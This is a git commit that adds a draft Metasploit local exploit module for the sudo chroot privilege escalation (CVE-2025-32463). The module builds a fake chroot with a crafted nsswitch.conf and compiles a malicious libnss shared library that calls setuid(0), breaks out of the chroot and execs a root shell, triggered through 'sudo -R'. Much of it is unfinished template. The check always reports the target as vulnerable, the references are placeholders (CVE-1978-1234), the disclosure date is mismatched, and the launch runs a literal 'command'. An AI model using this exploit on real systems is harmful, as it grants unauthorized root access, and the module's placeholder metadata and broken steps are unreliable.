Init

msutovsky-r7 · msutovsky-r7 · commit 119e48760d67 · 2025-07-10T15:21:58.000+02:00
diff --git a/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb b/modules/exploits/linux/local/sudo_chroot_cve_2025_32463.rb
@@ -0,0 +1,193 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+###
+#
+# This exploit sample shows how an exploit module could be written to exploit
+# a bug in a command on a linux computer for priv esc.
+#
+###
+class MetasploitModule < Msf::Exploit::Local
+  Rank = NormalRanking # https://docs.metasploit.com/docs/using-metasploit/intermediate/exploit-ranking.html
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::Kernel
+  include Msf::Post::Linux::System
+  include Msf::Post::Linux::Compile
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  prepend Msf::Exploit::Remote::AutoCheck
+
+
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        # The Name should be just like the line of a Git commit - software name,
+        # vuln type, class. Preferably apply
+        # some search optimization so people can actually find the module.
+        # We encourage consistency between module name and file name.
+        'Name' => 'Sudo Chroot 1.9.17 Privilege Escalation',
+        'Description' => %q{
+          This exploit module illustrates how a vulnerability could be exploited
+          in an linux command for priv esc.
+        },
+        'License' => MSF_LICENSE,
+        # The place to add your name/handle and email.  Twitter and other contact info isn't handled here.
+        # Add reference to additional authors, like those creating original proof of concepts or
+        # reference materials.
+        # It is also common to comment in who did what (PoC vs metasploit module, etc)
+        'Author' => [
+          'h00die <mike@stcyrsecurity.com>', # msf module
+          'researcher' # original PoC, analysis
+        ],
+        'Platform' => [ 'linux' ],
+        # from underlying architecture of the system.  typically ARCH_X64 or ARCH_X86, but the exploit
+        # may only apply to say ARCH_PPC or something else, where a specific arch is required.
+        # A full list is available in lib/msf/core/payload/uuid.rb
+        'Arch' => [ ARCH_CMD ],
+        # What types of sessions we can use this module in conjunction with.  Most modules use libraries
+        # which work on shell and meterpreter, but there may be a nuance between one of them, so best to
+        # test both to ensure compatibility.
+        'SessionTypes' => [ 'shell' ],
+        'Targets' => [[ 'Auto', {} ]],
+        # from lib/msf/core/module/privileged, denotes if this requires or gives privileged access
+        # since privilege escalation modules typically result in elevated privileges, this is
+        # generally set to true
+        'Privileged' => true,
+        'References' => [
+          [ 'OSVDB', '12345' ],
+          [ 'EDB', '12345' ],
+          [ 'URL', 'http://www.example.com'],
+          [ 'CVE', '1978-1234']
+        ],
+        'DisclosureDate' => '2023-11-29',
+        # Note that DefaultTarget refers to the index of an item in Targets, rather than name.
+        # It's generally easiest just to put the default at the beginning of the list and skip this
+        # entirely.
+        'DefaultTarget' => 0,
+        # https://docs.metasploit.com/docs/development/developing-modules/module-metadata/definition-of-module-reliability-side-effects-and-stability.html
+        'Notes' => {
+          'Stability' => [],
+          'Reliability' => [],
+          'SideEffects' => []
+        }
+      )
+    )
+
+
+    # force exploit is used to bypass the check command results
+    register_advanced_options [
+      OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ]),
+
+    ]
+  end
+
+
+
+  def check
+
+    return CheckCode::Appears("Vulnerable app version detected")
+    # Check the kernel version to see if its in a vulnerable range
+    # we guard this because some distros have funky kernel versions https://github.com/rapid7/metasploit-framework/issues/19812
+#    release = kernel_release
+#    begin
+#      if Rex::Version.new(release.split('-').first) > Rex::Version.new('4.14.11') ||
+#         Rex::Version.new(release.split('-').first) < Rex::Version.new('4.0')
+#        return CheckCode::Safe("Kernel version #{release} is not vulnerable")
+#      end
+#    rescue ArgumentError => e
+#      return CheckCode::Safe("Error determining or processing kernel release (#{release}) into known format: #{e}")
+#    end
+#    vprint_good "Kernel version #{release} appears to be vulnerable"
+#
+#    # Check the app is installed and the version, debian based example
+#    package = cmd_exec('dpkg -l example | grep \'^ii\'')
+#    if package&.include?('1:2015.3.14AR.1-1build1')
+#      return CheckCode::Appears("Vulnerable app version #{package} detected")
+#    end
+#
+#    CheckCode::Safe("app #{package} is not vulnerable")
+  end
+
+  #
+  # The exploit method drops a payload file to the system, then either compiles and runs
+  # or just runs the exploit on the system.
+  #
+  def exploit
+    # Check if we're already root
+    if !datastore['ForceExploit'] && is_root?
+      fail_with Failure::None, 'Session already has root privileges. Set ForceExploit to override'
+    end
+    
+    payload_file = rand_text_alphanumeric(5..10)
+
+    temp_dir = "/#{datastore['WritableDir']}/#{rand_text_alphanumeric(5..10)}"
+    
+    mkdir(temp_dir)
+    
+    cd(temp_dir)
+    
+    cmd_exec("mkdir -p woot/etc libnss_")
+    cmd_exec(%<echo "passwd: /woot1337" \> woot/etc/nsswitch.conf>)
+    cmd_exec("cp /etc/group woot/etc")
+
+    exploit_code = %Q<
+    #include <stdlib.h>
+    #include <unistd.h>
+
+    __attribute__((constructor))
+    void woot(void) {
+      setreuid(0,0);          /* change to UID 0 */
+      setregid(0,0);          /* change  to GID 0 */
+      chdir("/");             /* exit from chroot */
+      execve("/tmp/pwned",NULL,NULL); /* root shell */
+    }>
+
+    upload_and_compile("#{temp_dir}/libnss_/woot1337.so.2", exploit_code, "-shared -fPIC -Wl,-init,woot")
+
+    cmd_exec("sudo -R woot woot")
+
+    timeout = 30
+    print_status 'Launching exploit...'
+    output = cmd_exec "command", nil, timeout
+    output.each_line { |line| vprint_status line.chomp }
+
+    #    # Make sure we can write our exploit and payload to the local system
+#    unless writable? base_dir
+#      fail_with Failure::BadConfig, "#{base_dir} is not writable"
+#    end
+#
+#    # Upload exploit executable, writing to a random name so AV doesn't have too easy a job
+#    executable_name = ".#{rand_text_alphanumeric(5..10)}"
+#    executable_path = "#{base_dir}/#{executable_name}"
+#    if live_compile?
+#      vprint_status 'Live compiling exploit on system...'
+#      upload_and_compile executable_path, strip_comments(exploit_data('example.c'))
+#      rm_f "#{executable_path}.c"
+#    else
+#      vprint_status 'Dropping pre-compiled exploit on system...'
+#      upload_and_chmodx executable_path, exploit_data('example')
+#    end
+#
+#    # register the file for automatic cleanup
+#    register_files_for_cleanup(executable_path)
+#
+#    # Upload payload executable
+#    payload_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
+#    upload_and_chmodx payload_path, generate_payload_exe
+#    # register payload for automatic cleanup
+#    register_files_for_cleanup(payload_path)
+#
+#    # Launch exploit with a timeout.  We also have a vprint_status so if the user wants all the
+#    # output from the exploit being run, they can optionally see it
+#    timeout = 30
+#    print_status 'Launching exploit...'
+#    output = cmd_exec "echo '#{payload_path} & exit' | #{executable_path}", nil, timeout
+#    output.each_line { |line| vprint_status line.chomp }
+  end
+end
